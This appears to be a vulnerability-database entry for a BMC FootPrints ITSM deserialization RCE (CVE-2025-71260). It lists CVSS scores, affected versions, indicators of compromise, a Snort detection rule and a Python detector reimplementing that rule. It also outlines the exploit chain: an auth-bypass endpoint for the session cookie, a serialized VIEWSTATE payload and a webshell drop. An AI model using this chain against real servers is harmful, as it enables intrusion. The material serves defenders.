CVE-2025-71260
published 2026-03-19


Priority: P1 83 high
CVSS 3.1: 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 34.36% (98.2th percentile)
BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a deserialization of untrusted data vulnerability in the ASP.NET servlet's VIEWSTATE handling that allows authenticated attackers to execute arbitrary code. Attackers can supply crafted serialized objects to the VIEWSTATE parameter to achieve remote code execution and fully compromise the application. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01.

Affected (2 ranges)

Vendor            Product          Version range             Fixed in
bmc               footprints_itsm  20.20.02 – 20.24.01.001
bmc_software_inc  footprints       20.20.02 – 20.24.01.001

Detection & IOCs (extracted from sources)

url:    /footprints/servicedesk/aspnetconfig
path:   /footprints/servicedesk/aspnetconfig
cookie: SEC_TOKEN=
bytes:  rO0
snort rule:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS BMC FootPrints aspnetconfig __VIEWSTATE Parameter Unsafe Deserialization Remote Code Execution Attempt (CVE-2025-71260)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:36; content:"/footprints/servicedesk/aspnetconfig"; fast_pattern; http.cookie; content:"SEC_TOKEN|3d|"; startswith; http.request_body; content:"Content-Disposition|3a 20|form-data|3b 20|name|3d 22 5d 5d|VIEWSTATE|22|"; content:"rO0"; within:20; reference:url,labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/; reference:cve,2025-71260; reference:cve,2025-21760; classtype:attempted-admin; sid:2068320; rev:1; metadata:affected_product BMC_FootPrints, attack_target Server, tls_state TLSDecrypt, created_at 2026_03_18, cve CVE_2025_21760, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2026_03_18, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit chain entry point: unauthenticated GET to /footprints/servicedesk/passwordreset/request/ returns a SEC_TOKEN session cookie, which is then used to authenticate the deserialization request to /footprints/servicedesk/aspnetconfig.
  • The deserialization payload is delivered via the __VIEWSTATE parameter in a POST to /footprints/servicedesk/aspnetconfig. The serialized Java object begins with the magic bytes 'rO0' (base64-encoded Java serialization header 0xACED0000).
  • Successful exploitation drops a JSP webshell under webapps/ROOT/ (e.g., watchTowr.jsp or a random 9-character alphanumeric filename). Monitor for new .jsp files appearing in the webapps/ROOT directory and HTTP 200 responses to GET /<random>.jsp containing 'System Information', 'OS User:', and 'Current Working Directory:'.
  • The Snort/ET rule (sid:2068320) fires on POST requests to /footprints/servicedesk/aspnetconfig with a SEC_TOKEN cookie and a multipart body containing a VIEWSTATE field whose value starts with 'rO0'. Deploy this rule on perimeter and internal sensors with TLS decryption enabled.
  • The exploit is described as 'pre-authentication RCE' when chained with CVE-2025-71257 (auth bypass via /footprints/servicedesk/passwordreset/request/) and CVE-2025-71259/CVE-2025-71258 (SSRF). CVE-2025-71260 alone requires an authenticated session (SEC_TOKEN cookie), but the auth bypass makes the full chain unauthenticated.
  • The Nuclei template payload targets the webapps/ROOT/ path for the JSP drop, implying a Tomcat-based deployment. The dropped webshell filename is randomized (9 alphanumeric characters) per execution to evade static filename detection; defenders should use content-based detection rather than filename matching.
  • The ET Snort rule metadata specifies tls_state TLSDecrypt, meaning the rule only fires when TLS inspection/decryption is active. Without SSL decryption, the rule will not trigger on HTTPS traffic.
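As an added defensive example (not code from this page, from Emerging Threats, or from BMC), the following Python applies the same conditions as the Snort rule above to a parsed HTTP request, so the logic can be reused over decrypted proxy or WAF logs where no IDS sensor sits. The request fixture, boundary and cookie values are constructed test data; the only page-derived facts are the URI, the SEC_TOKEN cookie name, the VIEWSTATE field and the 'rO0' prefix.

```python
import re
from dataclasses import dataclass, field

TARGET_URI = "/footprints/servicedesk/aspnetconfig"
JAVA_SERIAL_B64_PREFIX = b"rO0"  # base64 of the Java serialization header bytes AC ED 00


@dataclass
class HttpRequest:
    method: str
    uri: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def multipart_fields(body: bytes, content_type: str) -> dict:
    """Return {field name: raw value} for a multipart/form-data body."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return {}
    fields = {}
    for part in body.split(b"--" + m.group(1).encode()):
        head, sep, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]+)"', head)
        if sep and name:
            fields[name.group(1).decode()] = value.strip()
    return fields


def is_cve_2025_71260_attempt(req: HttpRequest) -> bool:
    """Apply the ET rule's conditions: POST to the aspnetconfig servlet with a
    SEC_TOKEN cookie and a VIEWSTATE field carrying base64 Java serialization."""
    if req.method != "POST" or req.uri != TARGET_URI:
        return False
    # The ET rule anchors SEC_TOKEN at the start of the cookie buffer; this
    # check accepts it anywhere so cookie ordering cannot cause a miss.
    if not re.search(r"(^|;\s*)SEC_TOKEN=", req.headers.get("Cookie", "")):
        return False
    fields = multipart_fields(req.body, req.headers.get("Content-Type", ""))
    return any(name.endswith("VIEWSTATE") and value.startswith(JAVA_SERIAL_B64_PREFIX)
               for name, value in fields.items())


def build_request(viewstate: str) -> HttpRequest:
    """Constructed sample request (test data, not captured traffic)."""
    boundary = "----boundaryCONSTRUCTED"
    body = (f'--{boundary}\r\nContent-Disposition: form-data; name="__VIEWSTATE"\r\n\r\n'
            f"{viewstate}\r\n--{boundary}--\r\n").encode()
    cookies = "JSESSIONID=constructed; SEC_TOKEN=constructed"  # constructed values
    return HttpRequest("POST", TARGET_URI, {"Cookie": cookies,
                       "Content-Type": f"multipart/form-data; boundary={boundary}"}, body)
```

A legitimate ASP.NET view state is base64 beginning with '/wEP', so a VIEWSTATE value starting with 'rO0' is never expected from the real client and is a high-confidence indicator rather than a heuristic.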

CVSS provenance

Source  Version  Score  Severity  Vector
nvd     v3.1     8.8    HIGH      CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd     v4.0     8.7    HIGH      CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X